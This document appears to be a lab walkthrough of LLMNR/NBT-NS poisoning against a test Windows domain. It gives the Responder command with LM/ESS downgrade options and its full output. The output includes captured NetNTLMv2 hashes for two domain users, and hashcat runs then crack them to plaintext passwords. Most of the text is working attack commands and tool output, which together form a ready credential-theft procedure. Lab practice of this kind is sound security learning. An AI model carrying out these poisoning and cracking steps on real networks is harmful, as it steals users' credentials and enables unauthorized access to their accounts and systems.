In this case, we will look into how we can use LLMNR to poisoning to get the hash for a specific user and crack that in order to gain access.

We have a domain called master.loc where the domain controller is dc1. The client workstation is client1.

LLMNR is a protocol which is used to discover any hosts present in the network. In our scenario, we will try to access a fileserver called wow.master.loc in order to trigger the LLMNR lookup and eventually grab that users hash.

Than we will proceed to cracking the hash.

──╼ $sudo responder -I enp0s8 --lm --disable-ess
[sudo] password for saitama: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

  To support this project:
  Patreon -> https://www.patreon.com/PythonResponder
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [ON]
    Force ESS downgrade        [ON]

[+] Generic Options:
    Responder NIC              [enp0s8]
    Responder IP               [10.10.10.200]
    Responder IPv6             [fe80::786e:5609:a419:fbc2]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-JDPERRKYLH5]
    Responder Domain Name      [R632.LOCAL]
    Responder DCE-RPC Port     [49484]

[+] Listening for events...

[*] [NBT-NS] Poisoned answer sent to 10.10.10.150 for name WOW.MASTER.LOC (service: File Server)
[SMB] NTLMv2 Client   : 10.10.10.150
[SMB] NTLMv2 Username : notmaster\duser1
[SMB] NTLMv2 Hash     : duser1::notmaster:33dc78a2456c40ec:D272469A091520ED30CAD7A3E76D4A81:0101000000000000653DB9E08D34DA01A085F7FC65CAC43F00000000020000000000000000000000
[*] Skipping previously captured hash for notmaster\duser1
[+] Exiting...

crack that hash#

┌─[✗]─[saitama@parrot]─[~/Desktop/alldumps/20231222_ntlm_crack]
└──╼ $hashcat -m 5600 ./hash1.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-sandybridge-AMD Ryzen 7 PRO 7840U w/ Radeon 780M Graphics, 2864/5793 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 2 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

Cracking performance lower than expected?                 

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.           

Session..........: hashcat                                
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: DUSER1::notmaster:63ab4f52bfe5c023:96a45f46313d1897...000000
Time.Started.....: Fri Dec 22 09:18:44 2023 (6 secs)
Time.Estimated...: Fri Dec 22 09:18:50 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2571.4 kH/s (0.92ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 41%

Started: Fri Dec 22 09:18:18 2023
Stopped: Fri Dec 22 09:18:52 2023
┌─[✗]─[saitama@parrot]─[~/Desktop/alldumps/20231222_ntlm_crack]
└──╼ $
┌─[✗]─[saitama@parrot]─[~/Desktop/alldumps/20231222_ntlm_crack]
└──╼ $nano passwords.txt
┌─[saitama@parrot]─[~/Desktop/alldumps/20231222_ntlm_crack]
└──╼ $hashcat -m 5600 ./hash1.txt ./passwords.txt 
hashcat (v6.2.6) starting

...
[SNIP]
...


The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.           

DUSER1::notmaster:63ab4f52bfe5c023:96a45f46313d18979b7d7991e5d7500f:0101000000000000001b05076434da01323945816e5b73ff0000000002000800590044005a00520001001e00570049004e002d003400570055004e0055005200420033004e004100480004003400570049004e002d003400570055004e0055005200420033004e00410048002e00590044005a0052002e004c004f00430041004c0003001400590044005a0052002e004c004f00430041004c0005001400590044005a0052002e004c004f00430041004c0007000800001b05076434da01060004000200000008003000300000000000000000000000002000001028fcf78c0032b1a4dcb67ede3a65e72245aaa6a6beb593b109b4f07e10595b0a001000000000000000000000000000000000000900280063006900660073002f0077006f00770032002e006d00610073007400650072002e006c006f006300000000000000000000000000:dfgh@1234
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: DUSER1::notmaster:63ab4f52bfe5c023:96a45f46313d1897...000000
Time.Started.....: Fri Dec 22 09:21:17 2023 (0 secs)
Time.Estimated...: Fri Dec 22 09:21:17 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (./passwords.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    12766 H/s (0.02ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4/4 (100.00%)
Rejected.........: 0/4 (0.00%)
Restore.Point....: 0/4 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: abcd@1234 -> dfgh@1234
Hardware.Mon.#1..: Util: 12%

Started: Fri Dec 22 09:21:16 2023
Stopped: Fri Dec 22 09:21:19 2023

interesting1#

Following hash was got from the intercept

[SMB] NTLMv2-SSP Client   : fe80::19f1:b84c:143e:f139
[SMB] NTLMv2-SSP Username : NOTMASTER\duser3
[SMB] NTLMv2-SSP Hash     : duser3::NOTMASTER:e32b3308707ba8c7:670B2D866B67133871D533380A918AF2:01010000000000008053451A064FDA01D32AA183F4D4C90E00000000020008004300490030004E0001001E00570049004E002D004B00560057004400520035005200530054003600380004003400570049004E002D004B0056005700440052003500520053005400360038002E004300490030004E002E004C004F00430041004C00030014004300490030004E002E004C004F00430041004C00050014004300490030004E002E004C004F00430041004C00070008008053451A064FDA01060004000200000008003000300000000000000001000000002000000D8752D02707A6628EF94176A3F540CF8378EE1618BEE71B5A9BB534699D7E760A001000000000000000000000000000000000000900160063006900660073002F007300640066007300640066000000000000000000

It is to be noted that this user does not exist and we need to try to crack to confirm.

┌─[✗]─[user@parrot]─[/tmp]
└──╼ $hashcat -m 5600 ./hash.txt ./password.txt 
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-skylake-avx512-AMD Ryzen 9 7900X 12-Core Processor, 2912/5889 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 2 MB

Dictionary cache built:
* Filename..: ./password.txt
* Passwords.: 5
* Bytes.....: 53
* Keyspace..: 5
* Runtime...: 0 secs

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.           

DUSER3::NOTMASTER:e32b3308707ba8c7:670b2d866b67133871d533380a918af2:01010000000000008053451a064fda01d32aa183f4d4c90e00000000020008004300490030004e0001001e00570049004e002d004b00560057004400520035005200530054003600380004003400570049004e002d004b0056005700440052003500520053005400360038002e004300490030004e002e004c004f00430041004c00030014004300490030004e002e004c004f00430041004c00050014004300490030004e002e004c004f00430041004c00070008008053451a064fda01060004000200000008003000300000000000000001000000002000000d8752d02707a6628ef94176a3f540cf8378ee1618bee71b5a9bb534699d7e760a001000000000000000000000000000000000000900160063006900660073002f007300640066007300640066000000000000000000:duser@1234
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: DUSER3::NOTMASTER:e32b3308707ba8c7:670b2d866b671338...000000
Time.Started.....: Wed Jan 24 20:50:14 2024 (0 secs)
Time.Estimated...: Wed Jan 24 20:50:14 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (./password.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      139 H/s (0.01ms) @ Accel:512 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5/5 (100.00%)
Rejected.........: 0/5 (0.00%)
Restore.Point....: 0/5 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: abcd@1234 -> duser@3456

Started: Wed Jan 24 20:49:59 2024
Stopped: Wed Jan 24 20:50:15 2024
┌─[user@parrot]─[/tmp]
└──╼ $cat ./password.txt 
abcd@1234
efgh@1234
duser@1234
duser@2345
duser@3456